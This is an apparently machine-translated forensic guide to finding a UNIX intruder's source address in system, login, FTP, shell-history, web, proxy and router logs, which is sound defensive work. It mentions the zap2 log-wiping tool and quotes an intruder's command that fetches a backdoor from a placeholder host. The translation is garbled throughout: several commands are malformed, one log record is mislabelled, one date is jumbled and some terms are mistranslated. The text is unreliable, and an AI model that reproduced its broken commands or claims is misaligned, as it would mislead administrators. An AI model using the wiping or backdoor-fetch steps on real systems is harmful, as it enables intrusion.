After the UNIX system is infiltrated, it is very important to determine the loss and the attacker's attack source address. Although most intruders know how to use a compromised computer as a stepping stone to attack your server, what they did before launching a formal attack (exploratory scan) it often starts from their computers. The following describes how to analyze and determine the IP addresses of intruders from the logs of Compromised systems.
1. messages
/Var/adm is the UNIX log directory (/var/log in Linux ). There are quite a few log files in ASCII format. Of course, let's focus on the messages files first, which is usually the file that intruders are interested in, it records information from the system level. The following is a record showing the copyright or hardware information:
Apr 29 19:06:47 www login [28845]: failed login 1 FROM xxx. xxx, User not known to the underlying authentication module
This is the logon failure record: Apr 29 22:05:45 game PAM_pwdb [29509]: (login) session opened for user ncx by (uid = 0 ).
The first step should be Kill-HUP cat'/var/run/syslogd. pid '. Of course, intruders may have already done this.
2. wtmp, utmp logs, FTP Log
You can find the file named wtmp and utmp in the/var/adm,/var/log,/etc directory, these files record when and where users remotely log on to the host. In the hacker software, zap2 is the oldest and most popular (the compiled file name is generally called z2, or wipe) is used to "erase" user login information in these two files. However, due to laziness or slow network speed, many intruders did not upload or compile the file. The administrator can use the lastlog command to obtain the source address of the last connection from the intruders (of course, this address may be a stepping stone for them ). FTP logs are usually/var/log/xferlog, which records in detail the time, source, and file name of the file uploaded in ftp mode. However, this log is too obvious, therefore, the better intruders will hardly use FTP to transfer files. They generally use RCP.
3. sh_history
After obtaining the root permission, intruders can create their own intrusion accounts. A more advanced technique is to add a password to a user name that is not commonly used, such as UCP and lp. After the intrusion, even if the intruder deletes the file. sh_history or. run kill-HUP 'cat/var/run/inetd. conf 'to re-write the bash Command record on the memory page back to the disk, and then execute find/-name. sh_historyprint, carefully check the log of every suspicious shell command. You can find it in/usr/spool/lp (lp home dir),/usr/lib/uucp/and other directories. the sh_history file may also contain FTP xxx. xxx. xxx. xxx or rcpnobody@xxx.xxx.xxx.xxx:/tmp/backdoor this shows commands for intruders IP addresses or domain names.
4. HTTP server logs
This is the most effective way to determine the attacker's real attack source address. Take the most popular Apache server as an example. You can find access in the $/logs/directory. log File, which records the visitor's IP address, access time, and requested content. After being infiltrated, we should be able to find information similar to the following in this file: record: xxx. xxx. xxx. xxx [28/Apr/2000: 00: 29: 05-0800] "GET/cgi-bin/rguest.exe" 404-xxx. xxx. xxx. xxx [28/Apr/2000: 00: 28: 57-0800] "GET/msads/Samples/SELECTOR/showcode. asp "404
This indicates that the IP address is xxx. xxx. xxx. xxx intruders attempted to access/msads/Samples/SELECTOR/showcode at 00:28 on January 1, April 28, 2000. asp file, which is the log left after the web cgi scanner is used. Most web scanner intruders often choose servers closest to themselves. Combined with the attack time and IP address, we can know a lot of information about intruders.
5. Core dump
A secure and stable daemon does not "dump" the core of the system during normal operation. When intruders use remote vulnerability attacks, many services are executing a getpeername socket function call, so the IP addresses of intruders are also stored in the memory.
6. Proxy server logs
The proxy server is often used by large and medium-sized enterprise networks as an interface for internal and external information exchange. It faithfully records the access of every user.
Of course, it also includes the access information of intruders. Take the most common squid proxy as an example. Generally, you can find the huge log File access. log under/usr/local/squid/logs. You can get squid's log analysis script at the following address: http://www.squid-cache.org/Doc/Users-Guide/added/st. html by analyzing access logs to sensitive files, you can know who accessed the content that should have been kept confidential.
7. Router logs
By default, the vro does not record any scans and logins. Therefore, intruders often use it as a stepping stone for attacks. If your enterprise network is divided into military zones and non-military zones, adding vro logs will help track intruders in the future. More importantly, for Administrators
For example, this setting can determine whether the attacker is an internal thief or an external thief. Of course, you need an additional server to place the router. log file.
Note!
For intruders, it is unlikely that they attempt to establish a TCP connection with the target machine during the entire attack process. There are many subjective and objective reasons for intruders, in addition, it is quite difficult to leave no logs in the attack.
If we spend enough time and energy, we can analyze information about intruders from a large number of logs. In terms of the Behavior Psychology of intruders, the more permissions they obtain on the target machine, the more inclined they are to use a conservative method to establish a connection with the target machine. By carefully analyzing early logs, especially those that contain scans, we can have a better advantage.
Log auditing is only a passive defense method after intrusion. It actively strengthens its learning, upgrades or updates the system in time, and is the most effective way to prevent intrusion.